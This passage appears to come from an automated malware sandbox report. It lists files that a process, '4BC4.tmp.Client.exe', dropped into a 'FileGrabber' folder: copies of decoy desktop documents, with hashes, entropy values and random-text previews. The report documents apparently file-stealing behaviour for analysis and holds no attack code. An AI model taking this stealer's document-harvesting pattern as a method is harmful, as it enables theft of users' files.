SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\ProgramData\134349\FileGrabber\Desktop\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\ProgramData\134349\FileGrabber\Desktop\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\ProgramData\134349\FileGrabber\Desktop\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Desktop\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\ProgramData\134349\FileGrabber\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Desktop\ONBQCLYSPU\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Desktop\ONBQCLYSPU\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\ProgramData\134349\FileGrabber\Desktop\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
